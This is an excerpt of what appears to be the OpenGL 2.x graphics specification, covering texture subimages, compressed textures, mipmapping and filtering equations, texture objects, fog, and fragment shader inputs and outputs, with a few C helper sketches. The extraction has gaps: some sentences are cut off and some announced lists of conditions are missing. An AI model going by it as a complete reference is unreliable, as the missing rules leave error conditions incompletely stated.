Negative values of xoffset, yoffset, and zoffset correspond to the coordinates of border texels, addressed as in figure 3.10. Taking ws, hs, ds, and bs to be the specified width, height, depth, and border width of the texture array, and taking x, y, z, w, h, and d to be the xoffset, yoffset, zoffset, width, height, and depth argument values, any of the following relationships generates the error INVALID_VALUE:

    x < −bs        x + w > ws − bs
    y < −bs        y + h > hs − bs
    z < −bs        z + d > ds − bs

Counting from zero, the nth pixel group is assigned to the texel with internal integer coordinates [i, j, k], where

    i = x + (n mod w)
    j = y + (⌊n / w⌋ mod h)
    k = z + (⌊n / (width ∗ height)⌋ mod d)

Arguments xoffset and yoffset of TexSubImage2D and CopyTexSubImage2D specify the lower left texel coordinates of a width-wide by height-high rectangular subregion of the texture array. Negative values of xoffset and yoffset correspond to the coordinates of border texels, addressed as in figure 3.10. Taking ws, hs, and bs to be the specified width, height, and border width of the texture array, and taking x, y, w, and h to be the xoffset, yoffset, width, and height argument values, any of the following relationships generates the error INVALID_VALUE:

    x < −bs        x + w > ws − bs
    y < −bs        y + h > hs − bs

Counting from zero, the nth pixel group is assigned to the texel with internal integer coordinates [i, j], where

    i = x + (n mod w)
    j = y + (⌊n / w⌋ mod h)

The xoffset argument of TexSubImage1D and CopyTexSubImage1D specifies the left texel coordinate of a width-wide subregion of the texture array. Negative values of xoffset correspond to the coordinates of border texels.
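The INVALID_VALUE region checks for TexSubImage3D can be collapsed into one predicate. A sketch with an illustrative name; it mirrors the six inequalities, allowing offsets down to −bs for border texels.

```c
#include <stdbool.h>

/* Mirrors the INVALID_VALUE conditions for TexSubImage3D-style region
 * updates: offsets may reach -bs (border texels) and the region must stay
 * inside the border-trimmed upper edge.  Sketch, not a GL entry point. */
static bool subimage3d_region_ok(int x, int y, int z, int w, int h, int d,
                                 int ws, int hs, int ds, int bs)
{
    return !(x < -bs || x + w > ws - bs ||
             y < -bs || y + h > hs - bs ||
             z < -bs || z + d > ds - bs);
}
```

A full-array update of an 8 × 8 × 8 borderless array passes; shifting it by one texel overruns the upper edge and would generate INVALID_VALUE.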
Taking ws and bs to be the specified width and border width of the texture array, and x and w to be the xoffset and width argument values, either of the following relationships generates the error INVALID_VALUE:

    x < −bs        x + w > ws − bs

Counting from zero, the nth pixel group is assigned to the texel with internal integer coordinates [i], where

    i = x + (n mod w)

Texture images with compressed internal formats may be stored in such a way that it is not possible to modify an image with subimage commands without having to decompress and recompress the texture image. Even if the image were modified in this manner, it may not be possible to preserve the contents of some of the texels outside the region being modified. To avoid these complications, the GL does not support arbitrary modifications to texture images with compressed internal formats. Calling TexSubImage3D, CopyTexSubImage3D, TexSubImage2D, CopyTexSubImage2D, TexSubImage1D, or CopyTexSubImage1D will result in an INVALID_OPERATION error if xoffset, yoffset, or zoffset is not equal to −bs (border width). In addition, the contents of any texel outside the region modified by such a call are undefined. These restrictions may be relaxed for specific compressed internal formats whose images are easily modified.

The CompressedTexImage1D, CompressedTexImage2D, and CompressedTexImage3D commands define one-, two-, and three-dimensional texture images, respectively, with incoming data stored in a specific compressed image format. The target, level, internalformat, width, height, depth, and border parameters have the same meaning as in TexImage1D, TexImage2D, and TexImage3D. data refers to compressed image data stored in the compressed image format corresponding to internalformat.
If a pixel unpack buffer is bound (as indicated by a non-zero value of PIXEL_UNPACK_BUFFER_BINDING), data is an offset into the pixel unpack buffer and the compressed data is read from the buffer relative to this offset; otherwise, data is a pointer to client memory and the compressed data is read from client memory relative to the pointer. Since the GL provides no specific image formats, using any of the six generic compressed internal formats as internalformat will result in an INVALID_ENUM error.

For all other compressed internal formats, the compressed image will be decoded according to the specification defining the internalformat token. Compressed texture images are treated as an array of imageSize ubytes relative to data. If a pixel unpack buffer object is bound and data + imageSize is greater than the size of the pixel buffer, an INVALID_OPERATION error results. All pixel storage and pixel transfer modes are ignored when decoding a compressed texture image. If the imageSize parameter is not consistent with the format, dimensions, and contents of the compressed image, an INVALID_VALUE error results. If the compressed image is not encoded according to the defined image format, the results of the call are undefined.

Specific compressed internal formats may impose format-specific restrictions on the use of the compressed image specification calls or parameters. For example, the compressed image format might be supported only for 2D textures, or might not allow non-zero border values. Any such restrictions will be documented in the extension specification defining the compressed internal format; violating these restrictions will result in an INVALID_OPERATION error.
Any restrictions imposed by specific compressed internal formats will be invariant, meaning that if the GL accepts and stores a texture image in compressed form, providing the same image to CompressedTexImage1D, CompressedTexImage2D, or CompressedTexImage3D will not result in an INVALID_OPERATION error if the following restrictions are satisfied:

The CompressedTexSubImage1D, CompressedTexSubImage2D, and CompressedTexSubImage3D commands respecify only a rectangular region of an existing texture array, with incoming data stored in a known compressed image format. The target, level, xoffset, yoffset, zoffset, width, height, and depth parameters have the same meaning as in TexSubImage1D, TexSubImage2D, and TexSubImage3D. data points to compressed image data stored in the compressed image format corresponding to format. Since the core GL provides no specific image formats, using any of these six generic compressed internal formats as format will result in an INVALID_ENUM error.

The image pointed to by data and the imageSize parameter are interpreted as though they were provided to CompressedTexImage1D, CompressedTexImage2D, and CompressedTexImage3D. These commands do not provide for image format conversion, so an INVALID_OPERATION error results if format does not match the internal format of the texture image being modified. If the imageSize parameter is not consistent with the format, dimensions, and contents of the compressed image (too little or too much data), an INVALID_VALUE error results.

As with CompressedTexImage calls, compressed internal formats may have additional restrictions on the use of the compressed image specification calls or parameters. Any such restrictions will be documented in the specification defining the compressed internal format; violating these restrictions will result in an INVALID_OPERATION error.
Any restrictions imposed by specific compressed internal formats will be invariant, meaning that if the GL accepts and stores a texture image in compressed form, providing the same image to CompressedTexSubImage1D, CompressedTexSubImage2D, or CompressedTexSubImage3D will not result in an INVALID_OPERATION error if the following restrictions are satisfied:

• target, level, and format match the target, level and format parameters provided to the GetCompressedTexImage call returning data.

target is the target, either TEXTURE_1D, TEXTURE_2D, TEXTURE_3D, or TEXTURE_CUBE_MAP. pname is a symbolic constant indicating the parameter to be set; the possible constants and corresponding parameters are summarized in table 3.18. In the first form of the command, param is a value to which to set a single-valued parameter; in the second form of the command, params is an array of parameters whose type depends on the parameter being set. If the values for TEXTURE_BORDER_COLOR, or the value for TEXTURE_PRIORITY are specified as integers, the conversion for signed integers from table 2.9 is applied to convert these values to floating-point, followed by clamping each value to lie in [0, 1].

In the remainder of section 3.8, denote by lodmin, lodmax, levelbase, and levelmax the values of the texture parameters TEXTURE_MIN_LOD, TEXTURE_MAX_LOD, TEXTURE_BASE_LEVEL, and TEXTURE_MAX_LEVEL respectively.

Table 3.19: Selection of cube map images based on major axis direction of texture coordinates.

Texture parameters for a cube map texture apply to the cube map as a whole; the six distinct two-dimensional texture images use the texture parameters of the cube map itself.

If the value of texture parameter GENERATE_MIPMAP is TRUE, specifying or changing texture arrays may have side effects, which are discussed in the Automatic Mipmap Generation discussion of section 3.8.8.
The new (s, t) is computed from the selected sc, tc, and ma as

    s = (1/2) (sc / |ma| + 1)
    t = (1/2) (tc / |ma| + 1)

This new (s, t) is used to find a texture value in the determined face's two-dimensional texture image using the rules given in sections 3.8.7 through 3.8.9.

    min = 1 / (2N)

where N is the size of the one-, two-, or three-dimensional texture image in the direction of clamping. The maximum value is defined as

    max = 1 − min

so that clamping is always symmetric about the [0, 1] mapped range of a texture coordinate.

    min = −1 / (2N)

where N is the size (not including borders) of the one-, two-, or three-dimensional texture image in the direction of clamping. The maximum value is defined as

    max = 1 − min

The mirrored coordinate is then clamped as described above for wrap mode CLAMP_TO_EDGE.

    λ =  lodmax,     λ′ > lodmax
         λ′,         lodmin ≤ λ′ ≤ lodmax
         lodmin,     λ′ < lodmin
         undefined,  lodmin > lodmax        (3.20)

biastexobj is the value of TEXTURE_LOD_BIAS for the bound texture object (as described in section 3.8.4). biastexunit is the value of TEXTURE_LOD_BIAS for the current texture unit (as described in section 3.8.13). biasshader is the value of the optional bias parameter in the texture lookup functions available to fragment shaders. If the texture access is performed in a fragment shader without a provided bias, or outside a fragment shader, then biasshader is zero. The sum of these values is clamped to the range [−biasmax, biasmax] where biasmax is the value of the implementation defined constant MAX_TEXTURE_LOD_BIAS.

If λ(x, y) is less than or equal to the constant c (described below in section 3.8.9) the texture is said to be magnified; if it is greater, the texture is minified.

The initial values of lodmin and lodmax are chosen so as to never clamp the normal range of λ. They may be respecified for a specific texture by calling TexParameter[if] with pname set to TEXTURE_MIN_LOD or TEXTURE_MAX_LOD respectively.
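The LOD clamp of equation (3.20) and the bias summation can be sketched as two helpers. Names are illustrative, not GL entry points; the "undefined when lodmin > lodmax" case is simply passed through here.

```c
/* Equation (3.20): clamp the biased level of detail to [lod_min, lod_max].
 * Behavior is undefined when lod_min > lod_max; this sketch just clamps. */
static float clamp_lod(float lambda_prime, float lod_min, float lod_max)
{
    if (lambda_prime > lod_max) return lod_max;
    if (lambda_prime < lod_min) return lod_min;
    return lambda_prime;
}

/* Sum of the per-object, per-unit, and shader biases, clamped to
 * [-bias_max, bias_max] (bias_max plays MAX_TEXTURE_LOD_BIAS's role). */
static float total_lod_bias(float bias_obj, float bias_unit,
                            float bias_shader, float bias_max)
{
    float b = bias_obj + bias_unit + bias_shader;
    if (b > bias_max)  return bias_max;
    if (b < -bias_max) return -bias_max;
    return b;
}
```

With the initial lodmin/lodmax of −1000 and 1000, clamp_lod leaves any practical λ′ untouched, matching "never clamp the normal range of λ".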
Let s(x, y) be the function that associates an s texture coordinate with each set of window coordinates (x, y) that lie within a primitive; define t(x, y) and r(x, y) analogously. Let u(x, y) = wt × s(x, y), v(x, y) = ht × t(x, y), and w(x, y) = dt × r(x, y), where wt, ht, and dt are as defined by equations 3.15, 3.16, and 3.17 with ws, hs, and ds equal to the width, height, and depth of the image array whose level is levelbase. For a polygon, ρ is given at a fragment with window coordinates (x, y) by

    ρ = max{ √((∂u/∂x)² + (∂v/∂x)² + (∂w/∂x)²), √((∂u/∂y)² + (∂v/∂y)² + (∂w/∂y)²) }    (3.21)

where ∂u/∂x indicates the derivative of u with respect to window x, and similarly for the other derivatives. For a line, the formula is

    ρ = √((∂u/∂x Δx + ∂u/∂y Δy)² + (∂v/∂x Δx + ∂v/∂y Δy)² + (∂w/∂x Δx + ∂w/∂y Δy)²) / l    (3.22)

where Δx = x2 − x1 and Δy = y2 − y1 with (x1, y1) and (x2, y2) being the segment's window coordinate endpoints and l = √(Δx² + Δy²). For a point, pixel rectangle, or bitmap, ρ ≡ 1.

While it is generally agreed that equations 3.21 and 3.22 give the best results when texturing, they are often impractical to implement. Therefore, an implementation may approximate the ideal ρ with a function f(x, y) subject to these conditions:

2. Let

    mu = max{ |∂u/∂x|, |∂u/∂y| }
    mv = max{ |∂v/∂x|, |∂v/∂y| }
    mw = max{ |∂w/∂x|, |∂w/∂y| }

When TEXTURE_MIN_FILTER is NEAREST, the texel in the image array of level levelbase that is nearest (in Manhattan distance) to that specified by (s, t, r) is obtained. This means the texel at location (i, j, k) becomes the texture value, with i given by

    i = ⌊u⌋,      s < 1
        wt − 1,   s = 1        (3.23)

(Recall that if TEXTURE_WRAP_S is REPEAT, then 0 ≤ s < 1.) Similarly, j is found as

    j = ⌊v⌋,      t < 1
        ht − 1,   t = 1        (3.24)

and k is found as

    k = ⌊w⌋,      r < 1
        dt − 1,   r = 1        (3.25)

For a one-dimensional texture, j and k are irrelevant; the texel at location i becomes the texture value. For a two-dimensional texture, k is irrelevant; the texel at location (i, j) becomes the texture value.

When TEXTURE_MIN_FILTER is LINEAR, a 2 × 2 × 2 cube of texels in the image array of level levelbase is selected.
This cube is obtained by first wrapping texture coordinates as described in section 3.8.7, then computing

    i0 = ⌊u − 1/2⌋ mod wt,   TEXTURE_WRAP_S is REPEAT
         ⌊u − 1/2⌋,          otherwise

    j0 = ⌊v − 1/2⌋ mod ht,   TEXTURE_WRAP_T is REPEAT
         ⌊v − 1/2⌋,          otherwise

and

    k0 = ⌊w − 1/2⌋ mod dt,   TEXTURE_WRAP_R is REPEAT
         ⌊w − 1/2⌋,          otherwise

Then

    i1 = (i0 + 1) mod wt,    TEXTURE_WRAP_S is REPEAT
         i0 + 1,             otherwise

    j1 = (j0 + 1) mod ht,    TEXTURE_WRAP_T is REPEAT
         j0 + 1,             otherwise

and

    k1 = (k0 + 1) mod dt,    TEXTURE_WRAP_R is REPEAT
         k0 + 1,             otherwise

Let

    α = frac(u − 1/2)
    β = frac(v − 1/2)
    γ = frac(w − 1/2)

where frac(x) denotes the fractional part of x.

For a three-dimensional texture, the texture value τ is found as

    τ = (1−α)(1−β)(1−γ) τi0j0k0 + α(1−β)(1−γ) τi1j0k0
      + (1−α)β(1−γ) τi0j1k0 + αβ(1−γ) τi1j1k0
      + (1−α)(1−β)γ τi0j0k1 + α(1−β)γ τi1j0k1
      + (1−α)βγ τi0j1k1 + αβγ τi1j1k1

where τijk is the texel at location (i, j, k) in the three-dimensional texture image.

For a two-dimensional texture,

    τ = (1−α)(1−β) τi0j0 + α(1−β) τi1j0 + (1−α)β τi0j1 + αβ τi1j1

where τij is the texel at location (i, j) in the two-dimensional texture image. And for a one-dimensional texture,

    τ = (1 − α) τi0 + α τi1

Mipmapping

TEXTURE_MIN_FILTER values NEAREST_MIPMAP_NEAREST, NEAREST_MIPMAP_LINEAR, LINEAR_MIPMAP_NEAREST, and LINEAR_MIPMAP_LINEAR each require the use of a mipmap. A mipmap is an ordered set of arrays representing the same image; each array has a resolution lower than the previous one. If the image array of level levelbase, excluding its border, has dimensions wb × hb × db, then there are ⌊log2(max(wb, hb, db))⌋ + 1 image arrays in the mipmap. Numbering the levels such that level levelbase is the 0th level, the ith array has dimensions

    max(1, ⌊wb / 2^i⌋) × max(1, ⌊hb / 2^i⌋) × max(1, ⌊db / 2^i⌋)

until the last array is reached with dimension 1 × 1 × 1.

Each array in a mipmap is defined using TexImage3D, TexImage2D, CopyTexImage2D, TexImage1D, or CopyTexImage1D; the array being set is indicated with the level-of-detail argument level.
Level-of-detail numbers proceed from levelbase for the original texture array through p = ⌊log2(max(wb, hb, db))⌋ + levelbase with each unit increase indicating an array of half the dimensions of the previous one (rounded down to the next integer if fractional) as already described. All arrays from levelbase through q = min{p, levelmax} must be defined, as discussed in section 3.8.10.

The values of levelbase and levelmax may be respecified for a specific texture by calling TexParameter[if] with pname set to TEXTURE_BASE_LEVEL or TEXTURE_MAX_LEVEL respectively. The error INVALID_VALUE is generated if either value is negative.

The mipmap is used in conjunction with the level of detail to approximate the application of an appropriately filtered texture to a fragment. Let c be the value of λ at which the transition from minification to magnification occurs (since this discussion pertains to minification, we are concerned only with values of λ where λ > c).

For mipmap filters NEAREST_MIPMAP_NEAREST and LINEAR_MIPMAP_NEAREST, the dth mipmap array is selected, where

    d = levelbase,                     λ ≤ 1/2
        ⌈levelbase + λ + 1/2⌉ − 1,     λ > 1/2, levelbase + λ ≤ q + 1/2
        q,                             λ > 1/2, levelbase + λ > q + 1/2        (3.27)

The rules for NEAREST or LINEAR filtering are then applied to the selected array.

For mipmap filters NEAREST_MIPMAP_LINEAR and LINEAR_MIPMAP_LINEAR, the level d1 and d2 mipmap arrays are selected, where

    d1 = q,                  levelbase + λ ≥ q
         ⌊levelbase + λ⌋,    otherwise        (3.28)

    d2 = q,                  levelbase + λ ≥ q
         d1 + 1,             otherwise        (3.29)

The rules for NEAREST or LINEAR filtering are then applied to each of the selected arrays, yielding two corresponding texture values τ1 and τ2. The final texture value is then found as

    τ = [1 − frac(λ)] τ1 + frac(λ) τ2

• The dimensions of the arrays follow the sequence described in the Mipmapping discussion of section 3.8.8.

• levelbase ≤ levelmax

Array levels k where k < levelbase or k > q are insignificant to the definition of completeness.
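The mipmap chain arithmetic, ⌊log2(max(wb, hb, db))⌋ + 1 levels and halved-and-floored dimensions clamped to 1, can be sketched with shifts. Function names are illustrative.

```c
/* Number of arrays in a mipmap for a level_base image of wb x hb x db
 * (excluding border): floor(log2(max dimension)) + 1.  Sketch only. */
static int mipmap_levels(int wb, int hb, int db)
{
    int m = wb > hb ? wb : hb;
    if (db > m) m = db;
    int n = 0;
    while ((m >> n) > 1) n++;    /* n = floor(log2(m)) */
    return n + 1;
}

/* Dimension of the ith array relative to level_base:
 * max(1, floor(base_dim / 2^i)). */
static int mipmap_dim(int base_dim, int i)
{
    int d = base_dim >> i;
    return d < 1 ? 1 : d;
}
```

A 16 × 4 × 1 texture has five levels (16, 8, 4, 2, 1 along its widest axis), with the shorter axes pinned at 1 once exhausted.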
For cube map textures, a texture is cube complete if the following conditions all hold true:

• The levelbase arrays of each of the six texture images making up the cube map have identical, positive, and square dimensions.

• The levelbase arrays were each specified with the same internal format.

Finally, a cube map texture is mipmap cube complete if, in addition to being cube complete, each of the six texture images considered individually is complete.

level of detail, two integers describing the base and maximum mipmap array, a boolean flag indicating whether the texture is resident, a boolean indicating whether automatic mipmap generation should be performed, three integers describing the depth texture mode, compare mode, and compare function, and the priority associated with each set of properties. The value of the resident flag is determined by the GL and may change as a result of other GL operations. The flag may only be queried, not set, by applications (see section 3.8.12). In the initial state, the value assigned to TEXTURE_MIN_FILTER is NEAREST_MIPMAP_LINEAR, and the value for TEXTURE_MAG_FILTER is LINEAR. s, t, and r wrap modes are all set to REPEAT. The values of TEXTURE_MIN_LOD and TEXTURE_MAX_LOD are −1000 and 1000 respectively. The values of TEXTURE_BASE_LEVEL and TEXTURE_MAX_LEVEL are 0 and 1000 respectively. TEXTURE_PRIORITY is 1.0, and TEXTURE_BORDER_COLOR is (0, 0, 0, 0). The value of GENERATE_MIPMAP is false. The values of DEPTH_TEXTURE_MODE, TEXTURE_COMPARE_MODE, and TEXTURE_COMPARE_FUNC are LUMINANCE, NONE, and LEQUAL respectively. The initial value of TEXTURE_RESIDENT is determined by the GL.

In addition to the one-, two-, and three-dimensional and the six cube map sets of image arrays, the partially instantiated one-, two-, and three-dimensional and one cube map set of proxy image arrays are maintained.
Each proxy array includes width, height (two- and three-dimensional arrays only), depth (three-dimensional arrays only), border width, and internal format state values, as well as state for the red, green, blue, alpha, luminance, and intensity component resolutions. Proxy arrays do not include image data, nor do they include texture properties. When TexImage3D is executed with target specified as PROXY_TEXTURE_3D, the three-dimensional proxy state values of the specified level-of-detail are recomputed and updated. If the image array would not be supported by TexImage3D called with target set to TEXTURE_3D, no error is generated, but the proxy width, height, depth, border width, and component resolutions are set to zero. If the image array would be supported by such a call to TexImage3D, the proxy state values are set exactly as though the actual image array were being specified. No pixel data are transferred or processed in either case.

One- and two-dimensional proxy arrays are operated on in the same way when TexImage1D is executed with target specified as PROXY_TEXTURE_1D, or TexImage2D is executed with target specified as PROXY_TEXTURE_2D.

The cube map proxy arrays are operated on in the same manner when TexImage2D is executed with the target field specified as PROXY_TEXTURE_CUBE_MAP, with the addition that determining that a given cube map texture is supported with PROXY_TEXTURE_CUBE_MAP indicates that all six of the cube map 2D images are supported. Likewise, if the specified PROXY_TEXTURE_CUBE_MAP is not supported, none of the six cube map 2D images are supported.

A new texture object is created by calling BindTexture with target set to the desired texture target and texture set to the unused name. The resulting texture object is a new state vector, comprising all the state values listed in section 3.8.11, set to the same initial values.
If the new texture object is bound to TEXTURE_1D, TEXTURE_2D, TEXTURE_3D, or TEXTURE_CUBE_MAP, it is and remains a one-, two-, three-dimensional, or cube map texture respectively until it is deleted.

BindTexture may also be used to bind an existing texture object to either TEXTURE_1D, TEXTURE_2D, TEXTURE_3D, or TEXTURE_CUBE_MAP. The error INVALID_OPERATION is generated if an attempt is made to bind a texture object of a different target than the specified target. If the bind is successful no change is made to the state of the bound texture object, and any previous binding to target is broken.

While a texture object is bound, GL operations on the target to which it is bound affect the bound object, and queries of the target to which it is bound return state from the bound object. If texture mapping of the dimensionality of the target to which a texture object is bound is enabled, the state of the bound texture object directs the texturing operation.

In the initial state, TEXTURE_1D, TEXTURE_2D, TEXTURE_3D, and TEXTURE_CUBE_MAP have one-, two-, three-dimensional, and cube map texture state vectors respectively associated with them. In order that access to these initial textures not be lost, they are treated as texture objects all of whose names are 0. The initial one-, two-, three-dimensional, and cube map texture is therefore operated upon, queried, and applied as TEXTURE_1D, TEXTURE_2D, TEXTURE_3D, or TEXTURE_CUBE_MAP respectively while 0 is bound to the corresponding targets.

Texture objects are deleted by calling DeleteTextures. The command GenTextures returns n previously unused texture object names in textures. These names are marked as used, for the purposes of GenTextures only, but they acquire texture state and a dimensionality only when they are first bound, just as if they were unused.

An implementation may choose to establish a working set of texture objects on which binding operations are performed with higher performance. A texture object that is currently part of the working set is said to be resident.
The command AreTexturesResident returns TRUE if all of the n texture objects named in textures are resident, or if the implementation does not distinguish a working set. If at least one of the texture objects named in textures is not resident, then FALSE is returned, and the residence of each texture object is returned in residences. Otherwise the contents of residences are not changed. If any of the names in textures are unused or are zero, FALSE is returned, the error INVALID_VALUE is generated, and the contents of residences are indeterminate. The residence status of a single bound texture object can also be queried by calling GetTexParameteriv or GetTexParameterfv with target set to the target to which the texture object is bound, and pname set to TEXTURE_RESIDENT.

AreTexturesResident indicates only whether a texture object is currently resident, not whether it could not be made resident. An implementation may choose to make a texture object resident only on first use, for example. The client may guide the GL implementation in determining which texture objects should be resident by specifying a priority for each texture object. The command PrioritizeTextures sets the priorities of the n texture objects named in textures to the values in priorities. Each priority value is clamped to the range [0,1] before it is assigned. Zero indicates the lowest priority, with the least likelihood of being resident. One indicates the highest priority, with the greatest likelihood of being resident. The priority of a single bound texture object may also be changed by calling TexParameteri, TexParameterf, TexParameteriv, or TexParameterfv with target set to the target to which the texture object is bound, pname set to TEXTURE_PRIORITY, and param or params specifying the new priority value (which is clamped to the range [0,1] before being assigned). PrioritizeTextures silently ignores attempts to prioritize unused texture object names or zero (default textures).
The texture object name space, including the initial one-, two-, and three-dimensional texture objects, is shared among all texture units. A texture object may be bound to more than one texture unit simultaneously. After a texture object is bound, any GL operations on that target object affect any other texture units to which the same texture object is bound.

Texture binding is affected by the setting of the state ACTIVE_TEXTURE. If a texture object is deleted, it is as if all texture units which are bound to that texture object are rebound to texture object zero.

The TexEnv commands set parameters of the texture environment that specifies how texture values are interpreted when texturing a fragment, or set per-texture-unit filtering parameters. target must be one of POINT_SPRITE, TEXTURE_ENV or TEXTURE_FILTER_CONTROL. pname is a symbolic constant indicating the parameter to be set. In the first form of the command, param is a value to which to set a single-valued parameter; in the second form, params is a pointer to an array of parameters: either a single symbolic constant or a value or group of values to which the parameter should be set.

(TEXTUREn: color and alpha from the texture image bound to texture unit n.)

The state required for the current texture environment, for each texture unit, consists of a six-valued integer indicating the texture function, an eight-valued integer indicating the RGB combiner function and a six-valued integer indicating the ALPHA combiner function, six four-valued integers indicating the combiner RGB and ALPHA source arguments, three four-valued integers indicating the combiner RGB operands, three two-valued integers indicating the combiner ALPHA operands, and four floating-point environment color values.
In the initial state, the texture and combiner functions are each MODULATE, the combiner RGB and ALPHA sources are each TEXTURE, PREVIOUS, and CONSTANT for sources 0, 1, and 2 respectively, the combiner RGB operands for sources 0 and 1 are each SRC_COLOR, the combiner RGB operand for source 2, as well as for the combiner ALPHA operands, are each SRC_ALPHA, and the environment color is (0, 0, 0, 0).

The state required for the texture filtering parameters, for each texture unit, consists of a single floating-point level of detail bias. The initial value of the bias is 0.0.

Table 3.23: COMBINE texture functions. The scalar expression computed for the DOT3_RGB and DOT3_RGBA functions is placed into each of the 3 (RGB) or 4 (RGBA) components of the output. The result generated from COMBINE_ALPHA is ignored for DOT3_RGBA.

tion. The format of the resulting texture sample is determined by the value of DEPTH_TEXTURE_MODE.

    r = D_t

dimensionality using the rules given in sections 3.8.6 through 3.8.9. This texture value is used along with the incoming fragment in computing the texture function indicated by the currently bound texture environment. The result of this function replaces the incoming fragment's primary R, G, B, and A values. These are the color values passed to subsequent operations. Other data associated with the incoming fragment remain unchanged, except that the texture coordinates may be discarded.

Each texture unit is enabled and bound to texture objects independently from the other texture units. Each texture unit follows the precedence rules for one-, two-, three-dimensional, and cube map textures. Thus texture units can be performing texture mapping of different dimensionalities simultaneously. Each unit has its own enable and binding states.

Each texture unit is paired with an environment function, as shown in figure 3.11.
The second texture function is computed using the texture value from the second texture, the fragment resulting from the first texture function computation and the second texture unit's environment function. If there is a third texture, the fragment resulting from the second texture function is combined with the third texture value using the third texture unit's environment function and so on. The texture unit selected by ActiveTexture determines which texture unit's environment is modified by TexEnv calls.

If the value of TEXTURE_ENV_MODE is COMBINE, the texture function associated with a given texture unit is computed using the values specified by SRCn_RGB, SRCn_ALPHA, OPERANDn_RGB and OPERANDn_ALPHA. If TEXTUREn is specified as SRCn_RGB or SRCn_ALPHA, the texture value from texture unit n will be used in computing the texture function for this texture unit.

Texturing is enabled and disabled individually for each texture unit. If texturing is disabled for one of the units, then the fragment resulting from the previous unit is passed unaltered to the following unit. Individual texture units beyond those specified by MAX_TEXTURE_UNITS are always treated as disabled.

If a texture unit is disabled or has an invalid or incomplete texture (as defined in section 3.8.10) bound to it, then blending is disabled for that texture unit. If the texture environment for a given enabled texture unit references a disabled texture unit, or an invalid or incomplete texture that is bound to another unit, then the results of texture blending are undefined.

The required state, per texture unit, is four bits indicating whether each of one-, two-, three-dimensional, or cube map texturing is enabled or disabled. In the initial state, all texturing is disabled for all texture units.

Figure 3.11. Multitexture pipeline. Four texture units are shown; however, multitexturing may support a different number of units depending on the implementation.
The input fragment color is successively combined with each texture according to the state of the corresponding texture environment, and the resulting fragment color passed as input to the next texture unit in the pipeline.

3.10 Fog

If enabled, fog blends a fog color with a rasterized fragment's post-texturing color using a blending factor f. Fog is enabled and disabled with the Enable and Disable commands using the symbolic constant FOG.

This factor f is computed according to one of three equations:

    f = e^(−d·c)                   (3.31)
    f = e^(−(d·c)^2)               (3.32)
    f = (e − c) / (e − s)          (3.33)

If a vertex shader is active, or if the fog source, as defined below, is FOG_COORD, then c is the interpolated value of the fog coordinate for this fragment. Otherwise, if the fog source is FRAGMENT_DEPTH, then c is the eye-coordinate distance from the eye, (0, 0, 0, 1) in eye coordinates, to the fragment center. The equation and the fog source, along with either d or e and s, is specified with the Fog{if}[v] commands.

If pname is FOG_MODE, then param must be, or params must point to an integer that is one of the symbolic constants EXP, EXP2, or LINEAR, in which case equation 3.31, 3.32, or 3.33, respectively, is selected for the fog calculation (if, when 3.33 is selected, e = s, results are undefined). If pname is FOG_COORD_SRC, then param must be, or params must point to an integer that is one of the symbolic constants FRAGMENT_DEPTH or FOG_COORD. If pname is FOG_DENSITY, FOG_START, or FOG_END, then param is or params points to a value that is d, s, or e, respectively. If d is specified less than zero, the error INVALID_VALUE results.

An implementation may choose to approximate the eye-coordinate distance from the eye to each fragment center by |z_e|. Further, f need not be computed at each fragment, but may be computed at each vertex and interpolated as other data are.

No matter which equation and approximation is used to compute f, the result is clamped to [0, 1] to obtain the final f.

f is used differently depending on whether the GL is in RGBA or color index mode.
In RGBA mode, if C_r represents a rasterized fragment's R, G, or B value, then the corresponding value produced by fog is

    C = f·C_r + (1 − f)·C_f.

In color index mode, if i_r is the fragment's color index, the index produced by fog is

    I = i_r + (1 − f)·i_f.

The state required for fog consists of the three floating-point values d, e, and s, an RGBA fog color and a fog color index, a two-valued integer to select the fog coordinate source, and a single bit to indicate whether or not fog is enabled. In the initial state, fog is disabled, FOG_COORD_SRC is FRAGMENT_DEPTH, FOG_MODE is EXP, d = 1.0, e = 1.0, and s = 0.0; C_f = (0, 0, 0, 0) and i_f = 0.

Fog has no effect if a fragment shader is active.

fragment shader. These built-in varying variables include the data associated with a fragment that are used for fixed-function fragment processing, such as the fragment's position, color, secondary color, texture coordinates, fog coordinate, and eye z coordinate.

Additionally, when a vertex shader is active, it may define one or more varying variables (see section 2.15.3 and the OpenGL Shading Language Specification). These values are interpolated across the primitive being rendered. The results of these interpolations are available when varying variables of the same name are defined in the fragment shader.

User-defined varying variables are not saved in the current raster position. When processing fragments generated by the rasterization of a pixel rectangle or bitmap, the values of user-defined varying variables are undefined. Built-in varying variables have well-defined values.

Texture Access

Texture lookups involving textures with depth component data can either return the depth data directly or return the results of a comparison with the r texture coordinate used to perform the lookup. The comparison operation is requested in the shader by using the shadow sampler types (sampler1DShadow or sampler2DShadow) and in the texture using the TEXTURE_COMPARE_MODE parameter.
These requests must be consistent; the results of a texture lookup are undefined if:

If a fragment shader uses a sampler whose associated texture object is not complete, as defined in section 3.8.10, the texture image unit will return (R, G, B, A) = (0, 0, 0, 1).

The number of separate texture units that can be accessed from within a fragment shader during the rendering of a single primitive is specified by the implementation-dependent constant MAX_TEXTURE_IMAGE_UNITS.

Shader Inputs

The OpenGL Shading Language specification describes the values that are available as inputs to the fragment shader.

The built-in variable gl_FragCoord holds the window coordinates x, y, z, and 1/w for the fragment. The z component of gl_FragCoord undergoes an implied conversion to floating-point. This conversion must leave the values 0 and 1 invariant. Note that this z component already has a polygon offset added in, if enabled (see section 3.5.5). The 1/w value is computed from the w_c coordinate (see section 2.11), which is the result of the product of the projection matrix and the vertex's eye coordinates.

The built-in variables gl_Color and gl_SecondaryColor hold the R, G, B, and A components, respectively, of the fragment color and secondary color. Each

Shader Outputs

The OpenGL Shading Language specification describes the values that may be output by a fragment shader. These are gl_FragColor, gl_FragData[n], and gl_FragDepth. The final fragment color values or the final fragment data values written by a fragment shader are clamped to the range [0, 1] and then converted to fixed-point as described in section 2.14.9. The final fragment depth written by a fragment shader is first clamped to [0, 1] and then converted to fixed-point as if it were a window z value (see section 2.11.1). Note that the depth range computation is not applied here, only the conversion to fixed-point.
Writing to gl_FragColor specifies the fragment color (color number zero) that will be used by subsequent stages of the pipeline. Writing to gl_FragData[n] specifies the value of fragment color number n. Any colors, or color components, associated with a fragment that are not written by the fragment shader are undefined. A fragment shader may not statically assign values to both gl_FragColor and gl_FragData. In this case, a compile or link error will result. A shader statically assigns a value to a variable if, after pre-processing, it contains a statement that would write to the variable, whether or not run-time flow of control will cause that statement to be executed.

